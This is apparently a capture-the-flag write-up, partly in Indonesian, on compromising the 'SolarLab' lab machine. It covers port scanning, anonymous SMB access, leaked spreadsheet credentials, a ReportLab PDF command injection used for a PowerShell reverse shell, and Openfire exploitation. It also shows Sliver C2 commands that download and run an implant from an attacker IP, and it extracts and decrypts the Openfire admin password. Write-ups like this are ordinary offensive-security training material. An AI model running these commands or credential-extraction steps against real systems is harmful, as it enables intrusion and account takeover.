# SolarLab ## User Flag ### Enumeration #### Get Open Port ```bash sudo masscan -p1-65535,U:1-65535 10.129.44.43 --rate=1000 -e tun0 Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-05-15 22:36:28 GMT Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 6791/tcp on 10.129.44.43 Discovered open port 139/tcp on 10.129.44.43 Discovered open port 445/tcp on 10.129.44.43 Discovered open port 135/tcp on 10.129.44.43 Discovered open port 80/tcp on 10.129.44.43 rate: 0.00-kpps, 100.00% done, waiting -33-secs, found=5 ``` #### Scan Services Open Port ```bash sudo nmap -p '6791, 139, 445, 135, 80' -sVSC -A -oN nmap_detailed_all_tcp_ports.txt 10.129.44.43 -v2 [sudo] password for replican: Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-16 05:40 WIB NSE: Loaded 156 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 05:40 Completed NSE at 05:40, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 05:40 Completed NSE at 05:40, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 05:40 Completed NSE at 05:40, 0.00s elapsed Initiating Ping Scan at 05:40 Scanning 10.129.44.43 [4 ports] Completed Ping Scan at 05:40, 0.07s elapsed (1 total hosts) Initiating SYN Stealth Scan at 05:40 Scanning solarlab.htb (10.129.44.43) [5 ports] Discovered open port 6791/tcp on 10.129.44.43 Discovered open port 135/tcp on 10.129.44.43 Discovered open port 139/tcp on 10.129.44.43 Discovered open port 80/tcp on 10.129.44.43 Discovered open port 445/tcp on 10.129.44.43 Completed SYN Stealth Scan at 05:40, 0.06s elapsed (5 total ports) Initiating Service scan at 05:40 Scanning 5 services on solarlab.htb (10.129.44.43) Completed Service scan at 05:40, 11.17s elapsed (5 services on 1 host) Initiating OS detection (try #1) against solarlab.htb (10.129.44.43) Retrying OS detection (try #2) against solarlab.htb (10.129.44.43) Initiating Traceroute at 05:40 Completed Traceroute at 05:40, 0.05s elapsed Initiating Parallel DNS resolution of 1 host. at 05:40 Completed Parallel DNS resolution of 1 host. at 05:40, 0.04s elapsed NSE: Script scanning 10.129.44.43. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 05:40 NSE Timing: About 99.86% done; ETC: 05:41 (0:00:00 remaining) Completed NSE at 05:41, 40.24s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 05:41 Completed NSE at 05:41, 0.20s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 05:41 Completed NSE at 05:41, 0.00s elapsed Nmap scan report for solarlab.htb (10.129.44.43) Host is up, received echo-reply ttl 127 (0.039s latency). Scanned at 2024-05-16 05:40:42 WIB for 56s PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 nginx 1.24.0 |_http-title: SolarLab Instant Messenger |_http-server-header: nginx/1.24.0 | http-methods: |_ Supported Methods: GET HEAD 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? syn-ack ttl 127 6791/tcp open http syn-ack ttl 127 nginx 1.24.0 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.24.0 |_http-title: Did not follow redirect to http://report.solarlab.htb:6791/ Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows XP (85%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows XP SP3 (85%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.94%E=4%D=5/16%OT=80%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=66453A22%P=x86_64-pc-linux-gnu) SEQ(SP=103%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=U) OPS(O1=M53CNW8NNS%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS) WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=N%Q=) T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=N) U1(R=N) IE(R=Y%DFI=N%TG=80%CD=Z) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 19797/tcp): CLEAN (Timeout) | Check 2 (port 46928/tcp): CLEAN (Timeout) | Check 3 (port 17281/udp): CLEAN (Timeout) | Check 4 (port 59848/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_clock-skew: 0s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-05-15T22:41:01 |_ start_date: N/A TRACEROUTE (using port 6791/tcp) HOP RTT ADDRESS 1 39.81 ms 10.10.14.1 2 40.15 ms solarlab.htb (10.129.44.43) NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 05:41 Completed NSE at 05:41, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 05:41 Completed NSE at 05:41, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 05:41 Completed NSE at 05:41, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 56.15 seconds Raw packets sent: 93 (7.776KB) | Rcvd: 34 (2.080KB) ``` after all scan in http port using dirsearch we found nothing usefull. so continue #### Configuration ```bash echo '10.129.44.43 solarlab.htb report.solarlab.htb' | sudo tee -a /etc/hosts ``` ### Exploitation

ReportHUb is not a real name and is a rabbithole

after many, afterall we can login smb using anonymous credentials #### SMB anonymous ```bash smbclient -L 10.129.44.43 -U anonymous Can't load /etc/samba/smb.conf - run testparm to debug it Password for [WORKGROUP\anonymous]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Documents Disk IPC$ IPC Remote IPC SMB1 disabled -- no workgroup available ``` ```bash smbclient \\\\10.129.44.43\\Documents Can't load /etc/samba/smb.conf - run testparm to debug it Password for [WORKGROUP\replican]: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Fri Apr 26 21:47:14 2024 .. DR 0 Fri Apr 26 21:47:14 2024 concepts D 0 Fri Apr 26 21:41:57 2024 desktop.ini AHS 278 Fri Nov 17 17:54:43 2023 details-file.xlsx A 12793 Fri Nov 17 19:27:21 2023 My Music DHSrn 0 Fri Nov 17 02:36:51 2023 My Pictures DHSrn 0 Fri Nov 17 02:36:51 2023 My Videos DHSrn 0 Fri Nov 17 02:36:51 2023 old_leave_request_form.docx A 37194 Fri Nov 17 17:35:57 2023 7779839 blocks of size 4096. 1893544 blocks available smb: \> dir . DR 0 Fri Apr 26 21:47:14 2024 .. DR 0 Fri Apr 26 21:47:14 2024 concepts D 0 Fri Apr 26 21:41:57 2024 desktop.ini AHS 278 Fri Nov 17 17:54:43 2023 details-file.xlsx A 12793 Fri Nov 17 19:27:21 2023 My Music DHSrn 0 Fri Nov 17 02:36:51 2023 My Pictures DHSrn 0 Fri Nov 17 02:36:51 2023 My Videos DHSrn 0 Fri Nov 17 02:36:51 2023 old_leave_request_form.docx A 37194 Fri Nov 17 17:35:57 2023 7779839 blocks of size 4096. 1893544 blocks available smb: \> get details-file.xlsx getting file \details-file.xlsx of size 12793 as details-file.xlsx (64.7 KiloBytes/sec) (average 64.7 KiloBytes/sec) smb: \> exit ``` dan kita juga bisa meng enumerate smb user dengan ini dgn cara : ```bash crackmapexec smb solarlab.htb -u anonymous -p '' --rid-brute SMB 10.129.44.43 445 SOLARLAB [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False) SMB 10.129.44.43 445 SOLARLAB [+] solarlab\anonymous: SMB 10.129.44.43 445 SOLARLAB 500: SOLARLAB\Administrator (SidTypeUser) SMB 10.129.44.43 445 SOLARLAB 501: SOLARLAB\Guest (SidTypeUser) SMB 10.129.44.43 445 SOLARLAB 503: SOLARLAB\DefaultAccount (SidTypeUser) SMB 10.129.44.43 445 SOLARLAB 504: SOLARLAB\WDAGUtilityAccount (SidTypeUser) SMB 10.129.44.43 445 SOLARLAB 513: SOLARLAB\None (SidTypeGroup) SMB 10.129.44.43 445 SOLARLAB 1000: SOLARLAB\blake (SidTypeUser) SMB 10.129.44.43 445 SOLARLAB 1001: SOLARLAB\openfire (SidTypeUser) ``` nah sehabis kita dapetin file xlsx dan juga username yang ada. kita buka file xlsx nya ternyata mendapatkan berbagai password credentials

file yg kita download tadi di smb

nah setelah kita dapetin creds, cobain ke subdomainnya setelah mencoba beberapa username dari smb dan password dari xlsx nya saya menemukan bahwa creds yg tepat yakni BlakeB:ThisCanB3typedeasily1@ bagaimana saya tau usernamenya ini? kita bisa enumerasi pada username yang di file xlsx yang benar hanya 2 yakni Huruf besar diawal dan akhir. habis kita berhasil login

tampilan dashboardnya

nah sehabis itu kita tinggal test2 fiturnya

terdapat fitur generate pdf

setelah saya test2 fitur generate pdfnya berfungsi dan saya download pdfnya. untuk enumerasi lebih lanjut

pas kita exiftool

ternyata pas kita exiftools kita tau generate pdf nya pakai ReportLab generated PDF document -- digest (; nah lgsg pakai exploit ini tapi disitu exploitnya naruh di file baru. kita tinggal ambil payloadnya aja trs masukin di subject / bodynya ``` exploit ``` disini saya memakai revshell powershell karna ini command injection

dapet deh

## Root Flag ### Enumeration & Persistence jadi pertama kita persistencekan dlu biar enak. disini aku pakai Sliver. kalian bisa pakai c2 framework favorit kalian. tldr yg ku gunain ```bash - attacker - sliver > http --lport 1337 sliver > http --lport 1338 sliver > generate --http 10.10.14.45:1338 --save /tmp/ cd /tmp/ && python3 -m http.server 8000 - victim - curl -O v.exe http://10.10.14.45:8000/any.exe ./v.exe ```
dan bs diliat disini ada proccess sus yg jalan openfire-service. lgsg aja kita cek listen nya
kita lgsg aja nyalain proxy. dan connectin ke terminal kita ( proxychains ) dan browser kita, smartproxy

terlihat versinya juga

lgsg gas. eh iya lupa kenapa kita kok ngincer si openfire ini karna si openfire ini dijalanin oleh system

660 diatas adalah system

### Exploitation dengan informasi2 diatas dan mendapatkan versi dari technya kita dapat searching exploitnya hehehe {% embed url="" %} nah dapet deh. tinggal pakai, jgn lupa dipahami juga skid
dapet user passnya lgsg aja up plugin rce sesuai instruksi.

mendapatkan openfire user

setelah kita dapet openfire user. kita dapet liat di db file openfire ( ketika rooting / enumerating ) selalu cek db file db openfire ini sendiri ada di Programfiles embedded-db C:\Program Files\Openfire\embedded-db ``` INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0') INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL) ``` kita dapet credentials admin dan password key untuk dec dari hash ini. untuk dec openfire password enc ini bs searching aja pasti nemu

nih searching

{% embed url="" %} linknya {% endembed %} dapet deh ```bash java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040) ``` lgsg aja coba pw ini ke administrator

btw c public bs akses semua

dan berhasil dapet root access.